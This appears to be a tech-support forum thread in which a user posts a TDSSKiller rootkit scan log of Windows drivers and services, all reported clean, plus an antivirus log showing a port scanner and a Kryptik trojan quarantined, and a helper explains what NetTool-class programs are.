09:28:13.0515 0x0a3c  [ FB18CC1D4C2E716B6B903B0AC0CC0609, F10CCA63493782B16DE6B96B94A27078DBE68AECEF34FDF840CFF86D2C6E3C5E ] mouclass        C:\Windows\system32\DRIVERS\mouclass.sys
09:28:13.0519 0x0a3c  mouclass - ok
09:28:13.0561 0x0a3c  [ 2C388D2CD01C9042596CF3C8F3C7B24D, B2FB72272BB01AEDA4047B57C943B7E9BD8A6497854F8CC34672AAA592D0A703 ] mouhid          C:\Windows\system32\DRIVERS\mouhid.sys
09:28:13.0564 0x0a3c  mouhid - ok
09:28:13.0586 0x0a3c  [ FC8771F45ECCCFD89684E38842539B9B, 806DDF2B4830CA866582FE74A521BB7DF26CA0E19013DAF584D3677FB48CC77A ] mountmgr        C:\Windows\system32\drivers\mountmgr.sys
09:28:13.0591 0x0a3c  mountmgr - ok
09:28:13.0661 0x0a3c  [ 8072A7BB35D92CC621AC2605EEF79BC4, 68F61BE84A5032CEC24F04C90DACA1AE78F3744016389BE2345256B26E44E09A ] MpFilter        C:\Windows\system32\DRIVERS\MpFilter.sys
09:28:13.0674 0x0a3c  MpFilter - ok
09:28:13.0714 0x0a3c  [ 2D699FB6E89CE0D8DA14ECC03B3EDFE0, D3D903EEA465D77345AAC9B9F02CDEADF4831212EA2DE4FCA33BEE26EBB47420 ] mpio            C:\Windows\system32\drivers\mpio.sys
09:28:13.0722 0x0a3c  mpio - ok
09:28:13.0824 0x0a3c  [ 65C34426C83EFA32D48380A97717997B, CD7EB6BFBB0BE382BA21055460D9A72323F09AF3194A22D8EDB28D5DB3BAE8E7 ] MpKsld57ec004   c:\ProgramData\Microsoft\Microsoft Antimalware\Definition Updates\{C2B3D72C-220B-4FF7-A4B7-3383D6F5FCDA}\MpKsld57ec004.sys
09:28:13.0827 0x0a3c  MpKsld57ec004 - ok
09:28:13.0862 0x0a3c  [ AD2723A7B53DD1AACAE6AD8C0BFBF4D0, 1D6DCFA0E56C3E55B6AED819176E751502F863BA0FCF4F0B3253A81D208141A2 ] mpsdrv          C:\Windows\system32\drivers\mpsdrv.sys
09:28:13.0867 0x0a3c  mpsdrv - ok
09:28:13.0946 0x0a3c  [ 9835584E999D25004E1EE8E5F3E3B881, 71798B0CBE9AE69F1F29B845319019C69EC7F415CBABB3B87DDE92C360675021 ] MpsSvc          C:\Windows\system32\mpssvc.dll
09:28:13.0995 0x0a3c  MpsSvc - ok
09:28:14.0041 0x0a3c  [ 21F4B24ACFC79A483515BD986DD9043F, 22681907E02E0B723ABE2CEF0602D36C8EF862E7E2B62A9B40A5EF582E58D7BA ] MRxDAV          C:\Windows\system32\drivers\mrxdav.sys
09:28:14.0049 0x0a3c  MRxDAV - ok
09:28:14.0088 0x0a3c  [ 5D16C921E3671636C0EBA3BBAAC5FD25, 5BC107B95CAFC88F51FBB9F657B99944B20627A2B618F263093D7045E4FFD65C ] mrxsmb          C:\Windows\system32\DRIVERS\mrxsmb.sys
09:28:14.0095 0x0a3c  mrxsmb - ok
09:28:14.0130 0x0a3c  [ 6D17A4791ACA19328C685D256349FEFC, 012AA3D84EEAAF53780D06D2D11B9727DFC3441F3FAD75BC9E751FB814403668 ] mrxsmb10        C:\Windows\system32\DRIVERS\mrxsmb10.sys
09:28:14.0142 0x0a3c  mrxsmb10 - ok
09:28:14.0166 0x0a3c  [ B81F204D146000BE76651A50670A5E9E, 78193D0F967BE9829E53F9B500342934B4B1E1F4CEFC444382959E2061BC3B17 ] mrxsmb20        C:\Windows\system32\DRIVERS\mrxsmb20.sys
09:28:14.0172 0x0a3c  mrxsmb20 - ok
09:28:14.0207 0x0a3c  [ 012C5F4E9349E711E11E0F19A8589F0A, 208B92DFCF7AD43202660FBBC9FF5E03AEDBEE38178FF3628EB74CB6CD37C584 ] msahci          C:\Windows\system32\drivers\msahci.sys
09:28:14.0210 0x0a3c  msahci - ok
09:28:14.0241 0x0a3c  [ 55055F8AD8BE27A64C831322A780A228, C2C9FD1F61302997117B1CD0835E8234405BB80084065ED05363B77868397304 ] msdsm           C:\Windows\system32\drivers\msdsm.sys
09:28:14.0249 0x0a3c  msdsm - ok
09:28:14.0279 0x0a3c  [ E1BCE74A3BD9902B72599C0192A07E27, 5162EB623FE64E9DFEAC6CA2410EFA1314E62EC13207FFBFED2D61AA887603C4 ] MSDTC           C:\Windows\System32\msdtc.exe
09:28:14.0292 0x0a3c  MSDTC - ok
09:28:14.0351 0x0a3c  [ DAEFB28E3AF5A76ABCC2C3078C07327F, 6EB558532400B489763BAE7203538DE5F196282A8CB46A1B31D59120FC5AFCEF ] Msfs            C:\Windows\system32\drivers\Msfs.sys
09:28:14.0353 0x0a3c  Msfs - ok
09:28:14.0373 0x0a3c  [ 3E1E5767043C5AF9367F0056295E9F84, B2EDFECD3C14E4FE1BA87D9A86334043A9BD696A554EBD186DA7EAEB2EBD4F70 ] mshidkmdf       C:\Windows\System32\drivers\mshidkmdf.sys
09:28:14.0375 0x0a3c  mshidkmdf - ok
09:28:14.0405 0x0a3c  [ 0A4E5757AE09FA9622E3158CC1AEF114, ED574E420E57374E328C7C526504ECA569C164287966F06019EC207CB17F2C54 ] msisadrv        C:\Windows\system32\drivers\msisadrv.sys
09:28:14.0407 0x0a3c  msisadrv - ok
09:28:14.0454 0x0a3c  [ 90F7D9E6B6F27E1A707D4A297F077828, BEFC220EAA7307849600748842ACB9254A6A91158812D9B23EFAF912C498BA7F ] MSiSCSI         C:\Windows\system32\iscsiexe.dll
09:28:14.0464 0x0a3c  MSiSCSI - ok
09:28:14.0475 0x0a3c  msiserver - ok
09:28:14.0510 0x0a3c  [ 8C0860D6366AAFFB6C5BB9DF9448E631, 949C5A14E57F2D7385543C17C3485E7ADE36EA2016F6E0A1866571D2EDE90A77 ] MSKSSRV         C:\Windows\system32\drivers\MSKSSRV.sys
09:28:14.0513 0x0a3c  MSKSSRV - ok
09:28:14.0578 0x0a3c  [ 1EE3643D1AA747222427F63353611AD7, 18465E375485DF4E980121449077D5BA87C25C5FA8D86F40DA3B7BE153306766 ] MsMpSvc         c:\Program Files\Microsoft Security Client\MsMpEng.exe
09:28:14.0581 0x0a3c  MsMpSvc - ok
09:28:14.0602 0x0a3c  [ 3EA8B949F963562CEDBB549EAC0C11CE, 1B0B2F16A1790282504F3C548D47C3281EFB440D5D9711A1EF76D6371B768D2D ] MSPCLOCK        C:\Windows\system32\drivers\MSPCLOCK.sys
09:28:14.0605 0x0a3c  MSPCLOCK - ok
09:28:14.0617 0x0a3c  [ F456E973590D663B1073E9C463B40932, 48BA6D5580EE7B6A4C06E04772FD35B51779553FC0DD6C5C30DD8B5DEEB25B11 ] MSPQM           C:\Windows\system32\drivers\MSPQM.sys
09:28:14.0624 0x0a3c  MSPQM - ok
09:28:14.0652 0x0a3c  [ 0E008FC4819D238C51D7C93E7B41E560, 141FCEBDD05874407EAEC35A9DCD3BB16F2A428F23E55487D6A5DBFCADBF10D2 ] MsRPC           C:\Windows\system32\drivers\MsRPC.sys
09:28:14.0661 0x0a3c  MsRPC - ok
09:28:14.0696 0x0a3c  [ FC6B9FF600CC585EA38B12589BD4E246, F05DB01AE1955D2468CE6B51E51998B111CA3B0BDEED090EE6B99B625CBA564A ] mssmbios        C:\Windows\system32\drivers\mssmbios.sys
09:28:14.0699 0x0a3c  mssmbios - ok
09:28:14.0774 0x0a3c  MSSQL$ISSSQL - ok
09:28:14.0841 0x0a3c  [ 8E8E74C953EB0C4F8828D99D6F27FD6F, 94AFB1B09A6E92302D29B3C563B1744CECC5F5487418962BE537B7C57717CA42 ] MSSQLServerADHelper100 C:\Program Files\Microsoft SQL Server\100\Shared\SQLADHLP.EXE
09:28:14.0845 0x0a3c  MSSQLServerADHelper100 - ok
09:28:14.0887 0x0a3c  [ B42C6B921F61A6E55159B8BE6CD54A36, 6BB0A7BE005B8F281E551D1B8046CE4202372BC7AE0161881C858BFAC675FE1C ] MSTEE           C:\Windows\system32\drivers\MSTEE.sys
09:28:14.0890 0x0a3c  MSTEE - ok
09:28:14.0926 0x0a3c  [ 33599130F44E1F34631CEA241DE8AC84, E15B31D1AFDC8DC6D2B21D4215796A99ECC69EEDBB06CEED01AECC3C99A44C8B ] MTConfig        C:\Windows\system32\drivers\MTConfig.sys
09:28:14.0928 0x0a3c  MTConfig - ok
09:28:14.0954 0x0a3c  [ 159FAD02F64E6381758C990F753BCC80, E55AB01DCFA95ECAB24A2A9656E28FF9D064BA08B3D82DC8AA42F5991BA09598 ] Mup             C:\Windows\system32\Drivers\mup.sys
09:28:14.0958 0x0a3c  Mup - ok
09:28:15.0011 0x0a3c  [ 61D57A5D7C6D9AFE10E77DAE6E1B445E, D252248532142E9E2332DA693BC51B795102CA938B568FF04981E98B19BFBC5C ] napagent        C:\Windows\system32\qagentRT.dll
09:28:15.0078 0x0a3c  napagent - ok
09:28:15.0126 0x0a3c  [ 26384429FCD85D83746F63E798AB1480, 957C115C263A4B4DC854558B43ECE632D8E2BCCB744E23A01EBA7476BA2E7FFB ] NativeWifiP     C:\Windows\system32\DRIVERS\nwifi.sys
09:28:15.0149 0x0a3c  NativeWifiP - ok
09:28:15.0218 0x0a3c  [ 8C9C922D71F1CD4DEF73F186416B7896, 15FF43CD90C7913F83B35F2E7986561584588E8A45196EBD965C3A355836A9C7 ] NDIS            C:\Windows\system32\drivers\ndis.sys
09:28:15.0264 0x0a3c  NDIS - ok
09:28:15.0299 0x0a3c  [ 0E1787AA6C9191D3D319E8BAFE86F80C, F535022747355B2C66424BDA892D7DCB820C2EB8EE05BAE5BC6D1B1D65186278 ] NdisCap         C:\Windows\system32\DRIVERS\ndiscap.sys
09:28:15.0302 0x0a3c  NdisCap - ok
09:28:15.0342 0x0a3c  [ E4A8AEC125A2E43A9E32AFEEA7C9C888, 6EA181117126FC70B3C1DD1AC73CC26D1603A2CF49E47F66623E2C9489C49B55 ] NdisTapi        C:\Windows\system32\DRIVERS\ndistapi.sys
09:28:15.0345 0x0a3c  NdisTapi - ok
09:28:15.0366 0x0a3c  [ D8A65DAFB3EB41CBB622745676FCD072, 874D3C3D247C4A309DA813DB1D2EDB0037D3C489824BD5FE95B0C20699764EF7 ] Ndisuio         C:\Windows\system32\DRIVERS\ndisuio.sys
09:28:15.0370 0x0a3c  Ndisuio - ok
09:28:15.0405 0x0a3c  [ 38FBE267E7E6983311179230FACB1017, CFD1CBCA59650795C030DB30E5795B37C11C736E14003AE1DAB081BA5C0C9B14 ] NdisWan         C:\Windows\system32\DRIVERS\ndiswan.sys
09:28:15.0412 0x0a3c  NdisWan - ok
09:28:15.0436 0x0a3c  [ A4BDC541E69674FBFF1A8FF00BE913F2, 18CCFD063E9870B8B6958715BC0414C4D920AE63528EA1E9D7E30F7138918FFA ] NDProxy         C:\Windows\system32\drivers\NDProxy.sys
09:28:15.0441 0x0a3c  NDProxy - ok
09:28:15.0464 0x0a3c  [ 80B275B1CE3B0E79909DB7B39AF74D51, 75B406B0D9D28239D4EB2A298419A5F78A58237D88C5FD688EF1DFFAFACCF796 ] NetBIOS         C:\Windows\system32\DRIVERS\netbios.sys
09:28:15.0467 0x0a3c  NetBIOS - ok
09:28:15.0498 0x0a3c  [ 280122DDCF04B378EDD1AD54D71C1E54, F98B2ADE34F7E67C7C06C1D0FFB80ECBC353D044D4B4784CD952910345DC2ED0 ] NetBT           C:\Windows\system32\DRIVERS\netbt.sys
09:28:15.0508 0x0a3c  NetBT - ok
09:28:15.0526 0x0a3c  [ 803B370865D907EA21DC0C2B6A8936B5, E98F0BA1D94786E061A3EA2CC76041FF6BE0ADF47C6205D5572C03BF0E29CA78 ] Netlogon        C:\Windows\system32\lsass.exe
09:28:15.0532 0x0a3c  Netlogon - ok
09:28:15.0586 0x0a3c  [ 7CCCFCA7510684768DA22092D1FA4DB2, BB9E4F8FABBF596D888E6D303CB54A336D9DFF95B36AEA9369D2ED787DDC4B5D ] Netman          C:\Windows\System32\netman.dll
09:28:15.0620 0x0a3c  Netman - ok
09:28:15.0656 0x0a3c  [ 21318671BCAD3ACF16638F98D4D00973, CEA6E3B6BCB4B74A9ACACBEEA12EEA967BBC2240398E2EBC04D7910109CACA11 ] NetMsmqActivator C:\Windows\Microsoft.NET\Framework\v4.0.30319\SMSvcHost.exe
09:28:15.0678 0x0a3c  NetMsmqActivator - ok
09:28:15.0697 0x0a3c  [ 21318671BCAD3ACF16638F98D4D00973, CEA6E3B6BCB4B74A9ACACBEEA12EEA967BBC2240398E2EBC04D7910109CACA11 ] NetPipeActivator C:\Windows\Microsoft.NET\Framework\v4.0.30319\SMSvcHost.exe
09:28:15.0705 0x0a3c  NetPipeActivator - ok
09:28:15.0760 0x0a3c  [ 8C338238C16777A802D6A9211EB2BA50, 0D08A47CD403EDA5E8CAD7409BBBBCDC29A9861D2DC41D42B68B22B1AA1EBDD6 ] netprofm        C:\Windows\System32\netprofm.dll
09:28:15.0817 0x0a3c  netprofm - ok
09:28:15.0836 0x0a3c  [ 21318671BCAD3ACF16638F98D4D00973, CEA6E3B6BCB4B74A9ACACBEEA12EEA967BBC2240398E2EBC04D7910109CACA11 ] NetTcpActivator C:\Windows\Microsoft.NET\Framework\v4.0.30319\SMSvcHost.exe
09:28:15.0845 0x0a3c  NetTcpActivator - ok
09:28:15.0864 0x0a3c  [ 21318671BCAD3ACF16638F98D4D00973, CEA6E3B6BCB4B74A9ACACBEEA12EEA967BBC2240398E2EBC04D7910109CACA11 ] NetTcpPortSharing C:\Windows\Microsoft.NET\Framework\v4.0.30319\SMSvcHost.exe
09:28:15.0872 0x0a3c  NetTcpPortSharing - ok
09:28:15.0917 0x0a3c  [ 1D85C4B390B0EE09C7A46B91EFB2C097, 6A8850B151E88EE371F3CC543A946302DDF9494908D684B8B0C706A42CC54348 ] nfrd960         C:\Windows\system32\drivers\nfrd960.sys
09:28:15.0921 0x0a3c  nfrd960 - ok
09:28:15.0967 0x0a3c  [ FCBC2F48430EB0D7150A6521C0B84ACA, EEFB975E2D1121EE9E93702F2CA2938C99C6B2273616C85816BA15E857E8D4FF ] NisDrv          C:\Windows\system32\DRIVERS\NisDrvWFP.sys
09:28:15.0974 0x0a3c  NisDrv - ok
09:28:16.0015 0x0a3c  [ E4AA07F8BCBCB66EF115C443CD45C7A2, 3B538D9E376F12FC8589BA500BB5E859337CF1856D0E4AA66E2E3B5E301DAEC5 ] NisSrv          c:\Program Files\Microsoft Security Client\NisSrv.exe
09:28:16.0038 0x0a3c  NisSrv - ok
09:28:16.0080 0x0a3c  [ 374071043F9E4231EE43BE2BB48DD36D, C4FA3FC40CC49DBBB91901D14210A55D3831FAC9F9B3FF45FCA7F5CF242C9E92 ] NlaSvc          C:\Windows\System32\nlasvc.dll
09:28:16.0113 0x0a3c  NlaSvc - ok
09:28:16.0146 0x0a3c  [ 1DB262A9F8C087E8153D89BEF3D2235F, A51EE5D5AD3CD76B74BEA9C66C462608BF3B50C53DAA4110A75DB10495A8C101 ] Npfs            C:\Windows\system32\drivers\Npfs.sys
09:28:16.0149 0x0a3c  Npfs - ok
09:28:16.0187 0x0a3c  [ BA387E955E890C8A88306D9B8D06BF17, 3477BD9686C5777A93251C154512671AAA7533B18C536DF51F7B1D6D28E7F8A5 ] nsi             C:\Windows\system32\nsisvc.dll
09:28:16.0194 0x0a3c  nsi - ok
09:28:16.0215 0x0a3c  [ E9A0A4D07E53D8FEA2BB8387A3293C58, 690CAD6C4E35ECC1172A2E1FD3933DF73158B3BF42CB21244269612A53DE4D7A ] nsiproxy        C:\Windows\system32\drivers\nsiproxy.sys
09:28:16.0218 0x0a3c  nsiproxy - ok
09:28:16.0329 0x0a3c  [ C8DFF8D07755A66C7A4A738930F0FEAC, A2CC58312CE57988ABD976155BE91F558DCEC4C23481C6FBE64B361D511A36EA ] Ntfs            C:\Windows\system32\drivers\Ntfs.sys
09:28:16.0407 0x0a3c  Ntfs - ok
09:28:16.0429 0x0a3c  [ F9756A98D69098DCA8945D62858A812C, 572ADBFCFDE2030B34A013AADC14DBC144EB3F34D06991E2464A3EA9605BC045 ] Null            C:\Windows\system32\drivers\Null.sys
09:28:16.0432 0x0a3c  Null - ok
09:28:16.0473 0x0a3c  [ B3E25EE28883877076E0E1FF877D02E0, 402B6FED6FBBF645190396DC141141EF52DD059DABD01F8AC9CF01D23664070C ] nvraid          C:\Windows\system32\drivers\nvraid.sys
09:28:16.0480 0x0a3c  nvraid - ok
09:28:16.0513 0x0a3c  [ 4380E59A170D88C4F1022EFF6719A8A4, 93EDB3F4CDBF53C9C1970DD29AB146E390695C568180847BA8903F5FBEABCFF2 ] nvstor          C:\Windows\system32\drivers\nvstor.sys
09:28:16.0523 0x0a3c  nvstor - ok
09:28:16.0572 0x0a3c  [ 5A0983915F02BAE73267CC2A041F717D, D83461D74597BF2BE042FEFCC27FCD18BF63CB8135B0666D731D50951C3468A8 ] nv_agp          C:\Windows\system32\drivers\nv_agp.sys
09:28:16.0579 0x0a3c  nv_agp - ok
09:28:16.0609 0x0a3c  [ 08A70A1F2CDDE9BB49B885CB817A66EB, 0BB98123B544124B144F3E95D77E01E973D060B8B2302503FF24ABBBE803EB63 ] ohci1394        C:\Windows\system32\drivers\ohci1394.sys
09:28:16.0614 0x0a3c  ohci1394 - ok
09:28:16.0663 0x0a3c  [ 82A8521DDC60710C3D3D3E7325209BEC, C4E34571EDD57C7FBB3D736B5FE8BD154624705B5C8EA2EC898F19F75B9A5942 ] p2pimsvc        C:\Windows\system32\pnrpsvc.dll
09:28:16.0697 0x0a3c  p2pimsvc - ok
09:28:16.0743 0x0a3c  [ 59C3DDD501E39E006DAC31BF55150D91, E02B63AB7F34CF6FF3F644AF354D10004E6F50014E03172D80BD78934EF71EF1 ] p2psvc          C:\Windows\system32\p2psvc.dll
09:28:16.0778 0x0a3c  p2psvc - ok
09:28:16.0820 0x0a3c  [ 2EA877ED5DD9713C5AC74E8EA7348D14, 14BA3722CE5F8FF07F2D97DCDD6558EB49C9B02E5E6FAD6D9F18D354733EFECE ] Parport         C:\Windows\system32\drivers\parport.sys
09:28:16.0826 0x0a3c  Parport - ok
09:28:16.0865 0x0a3c  [ 3F34A1B4C5F6475F320C275E63AFCE9B, 31295D5121C0C3F2085E0EEBA260EEE4CA003993C026E2F81986D19158036E6B ] partmgr         C:\Windows\system32\drivers\partmgr.sys
09:28:16.0869 0x0a3c  partmgr - ok
09:28:16.0885 0x0a3c  [ EB0A59F29C19B86479D36B35983DAADC, AC09AFE7F13BE4079D01383BAC44091997E1AAF6512C9673A42B9E3780EB08A8 ] Parvdm          C:\Windows\system32\drivers\parvdm.sys
09:28:16.0887 0x0a3c  Parvdm - ok
09:28:16.0915 0x0a3c  [ 358AB7956D3160000726574083DFC8A6, 6CAFD4D1B8AB8C1D167ADC018985DDAB5AC2CBFFB3434FE6390F14AF50C19025 ] PcaSvc          C:\Windows\System32\pcasvc.dll
09:28:16.0929 0x0a3c  PcaSvc - ok
09:28:27.0950 0x0a3c  [ 6EB6B66517B048D87DC1856DDF1F4C3F, EBB534C4829477C70062ADBB5626236B02FE563A544C53FA255E79F3CA170FE8 ] wmiApSrv        C:\Windows\system32\wbem\WmiApSrv.exe
09:28:27.0959 0x0a3c  wmiApSrv - ok
09:28:28.0088 0x0a3c  [ 3B40D3A61AA8C21B88AE57C58AB3122E, 6C67DCB007C3CDF2EB0BBF5FD89C32CD7800C20F7166872F8C387BE262C5CD21 ] WMPNetworkSvc   C:\Program Files\Windows Media Player\wmpnetwk.exe
09:28:28.0157 0x0a3c  WMPNetworkSvc - ok
09:28:28.0194 0x0a3c  [ A2F0EC770A92F2B3F9DE6D518E11409C, 6838F2148B11285E00DC449D51F8AD85AAE57694E89BA2C607B87AC1C650D845 ] WPCSvc          C:\Windows\System32\wpcsvc.dll
09:28:28.0203 0x0a3c  WPCSvc - ok
09:28:28.0223 0x0a3c  [ AA53356D60AF47EACC85BC617A4F3F66, 155CB8112AA382D841C1891750FF29EF4F1BF716CD9CDF0F2243209E2CCCAC98 ] WPDBusEnum      C:\Windows\system32\wpdbusenum.dll
09:28:28.0236 0x0a3c  WPDBusEnum - ok
09:28:28.0262 0x0a3c  [ 6DB3276587B853BF886B69528FDB048C, 9972FF6DF0DF6F86D1E9BCEF4C29064748B217DA196B0633C30D3D580144951C ] ws2ifsl         C:\Windows\system32\drivers\ws2ifsl.sys
09:28:28.0265 0x0a3c  ws2ifsl - ok
09:28:28.0288 0x0a3c  [ 6F5D49EFE0E7164E03AE773A3FE25340, 15B6AFF7455538189A96F8863CC995A271E02C6FBDAC15B037D44DDA65E61339 ] wscsvc          C:\Windows\System32\wscsvc.dll
09:28:28.0300 0x0a3c  wscsvc - ok
09:28:28.0313 0x0a3c  WSearch - ok
09:28:28.0484 0x0a3c  [ FC3EC24FCE372C89423E015A2AC1A31E, 8D028182CF83667D3E4D148979972D208FA6D9B8540EE47A0A7831B770ECD257 ] wuauserv        C:\Windows\system32\wuaueng.dll
09:28:28.0615 0x0a3c  wuauserv - ok
09:28:28.0648 0x0a3c  [ 06E6F32C8D0A3F66D956F57B43A2E070, 9A6BD96A28294B0372F16E13D652FD603308F64B74A56E41E0C68C5E8011F943 ] WudfPf          C:\Windows\system32\drivers\WudfPf.sys
09:28:28.0654 0x0a3c  WudfPf - ok
09:28:28.0690 0x0a3c  [ 867C301E8B790040AE9CF6486E8041DF, D867D6498C987944D99508B2FAD6D6B749FA1EDFE8124B0863D4A642352F0855 ] WUDFRd          C:\Windows\system32\DRIVERS\WUDFRd.sys
09:28:28.0700 0x0a3c  WUDFRd - ok
09:28:28.0735 0x0a3c  [ FE47B7BC8EA320C2D9B5E5BF6E303765, 34518DBD1E9EA6E5DA62273B18613761E1D9C6B4E074A93C6D639FBAF02222EA ] wudfsvc         C:\Windows\System32\WUDFSvc.dll
09:28:28.0748 0x0a3c  wudfsvc - ok
09:28:28.0804 0x0a3c  [ 7CC38741B8F68F1E0D5D79DA6123666A, F90D2DA1C9AFB506C381CD386E1430931B5F81813FEDFD720F87FBC54E7A00DA ] WwanSvc         C:\Windows\System32\wwansvc.dll
09:28:28.0849 0x0a3c  WwanSvc - ok
09:28:28.0872 0x0a3c  ================ Scan global ===============================
09:28:28.0918 0x0a3c  [ DAB748AE0439955ED2FA22357533DDDB, 73EDD402C7479DDCE1998D0C7E99E1EC2974F64EFC33A851439CC85D09EDCDF9 ] C:\Windows\system32\basesrv.dll
09:28:28.0950 0x0a3c  [ 51BB04243DF6196C06E125898127E397, E1B6C83FC6E455F6806185027C5B56F8BA9ECDF1CD69E97301EC0291F0D3466E ] C:\Windows\system32\winsrv.dll
09:28:28.0999 0x0a3c  [ 51BB04243DF6196C06E125898127E397, E1B6C83FC6E455F6806185027C5B56F8BA9ECDF1CD69E97301EC0291F0D3466E ] C:\Windows\system32\winsrv.dll
09:28:29.0052 0x0a3c  [ 364455805E64882844EE9ACB72522830, 906561DBBB33F744844CF27E456226044C85DF0FCFD26DE1FD11E09E2CFA6F8F ] C:\Windows\system32\sxssrv.dll
09:28:29.0096 0x0a3c  [ 5F1B6A9C35D3D5CA72D6D6FDEF9747D6, D7BC4ED605B32274B45328FD9914FB0E7B90D869A38F0E6F94FB1BF4E9E2B407 ] C:\Windows\system32\services.exe
09:28:29.0129 0x0a3c  [ Global ] - ok
09:28:29.0130 0x0a3c  ================ Scan MBR ==================================
09:28:29.0143 0x0a3c  [ A36C5E4F47E84449FF07ED3517B43A31 ] \Device\Harddisk0\DR0
09:28:29.0340 0x0a3c  \Device\Harddisk0\DR0 - ok
09:28:29.0341 0x0a3c  ================ Scan VBR ==================================
09:28:29.0355 0x0a3c  [ C34E5BC4B9DFA9C73493621F56412020 ] \Device\Harddisk0\DR0\Partition1
09:28:29.0359 0x0a3c  \Device\Harddisk0\DR0\Partition1 - ok
09:28:29.0369 0x0a3c  [ 30C7AD82979D6F671E2BE6B5A532E3E5 ] \Device\Harddisk0\DR0\Partition2
09:28:29.0372 0x0a3c  \Device\Harddisk0\DR0\Partition2 - ok
09:28:29.0375 0x0a3c  Waiting for KSN requests completion. In queue: 48
09:28:30.0375 0x0a3c  Waiting for KSN requests completion. In queue: 48
09:28:31.0375 0x0a3c  Waiting for KSN requests completion. In queue: 48
09:28:32.0409 0x0a3c  AV detected via SS2: Microsoft Security Essentials, C:\Program Files\Microsoft Security Client\msseces.exe ( 4.5.216.0 ), 0x61000 ( enabled : updated )
09:28:32.0564 0x0a3c  Win FW state via NFP2: enabled
09:28:35.0457 0x0a3c  ============================================================
09:28:35.0457 0x0a3c  Scan finished
09:28:35.0457 0x0a3c  ============================================================
09:28:35.0484 0x04b0  Detected object count: 0
09:28:35.0484 0x04b0  Actual detected object count: 0
09:29:03.0317 0x17c0  Deinitialize success

--------------------------------------------------------------------------------------------------------------------------------------------------------

 

C:\MasterCD\SiteTools\ipscan.exe Win32/NetTool.Portscan.C potentially unsafe application deleted - quarantined
C:\Users\POS\AppData\Roaming\OracleJava\javaw.exe a variant of Win32/Kryptik.BZZR trojan cleaned by deleting - quarantined
 

 



#5 boopme


Posted 16 April 2014 - 03:07 PM

The infection Net Tool port scan could produce the behavior you described.

 

Programs classified as NetTool are designed to work with a network (for example, remotely rebooting a computer, scanning open network ports, remotely launching random applications, etc.). These features allow cyber criminals to use them for malicious purposes, although the programs themselves are not malicious.

Do you still see that behavior?





